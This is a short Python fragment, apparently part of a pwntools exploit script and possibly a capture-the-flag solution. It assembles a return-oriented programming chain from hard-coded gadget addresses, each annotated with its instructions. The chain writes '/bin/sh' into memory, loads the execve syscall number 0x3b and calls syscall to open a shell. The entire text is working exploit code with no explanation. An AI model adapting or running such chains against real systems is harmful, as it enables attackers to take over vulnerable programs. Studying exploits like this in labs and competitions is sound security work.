payload = p64(0x40976a)
#0x000000000040976a: pop rdi; pop rbp; ret; 
payload += p64(0x413070)+p64(0x0)+p64(0x4065a9)
# 0x00000000004065a9: pop rbx; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x0)+p64(0x406c37)
# 0x0000000000406c37: mov rax, rbx; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40ae5c)
# 0x000000000040ae5c: stosq qword ptr [rdi], rax; ret; 
payload += p64(0x406e33)
# 0x0000000000406e33: pop rsi; ret; 
payload += p64(0x0)+p64(0x40acb3)
# 0x000000000040acb3: mov eax, esi; ret; 
payload += p64(0x40b842)
# 0x000000000040b842: xchg eax, edx; lea rax, [rax + rdx*4]; ret; 
payload += p64(0x406e33)
# 0x0000000000406e33: pop rsi; ret; 
payload += p64(0x3b)+p64(0x40acb3)
# 0x000000000040acb3: mov eax, esi; ret; 
payload += p64(0x40976a)
# 0x000000000040976a: pop rdi; pop rbp; ret; 
payload += p64(0x413070)+p64(0x0)+p64(0x406e33)
# 0x0000000000406e33: pop rsi; ret; 
payload += p64(0x0)+p64(0x40e2bc)
# 0x000000000040e2bc: syscall; 
payload += b''
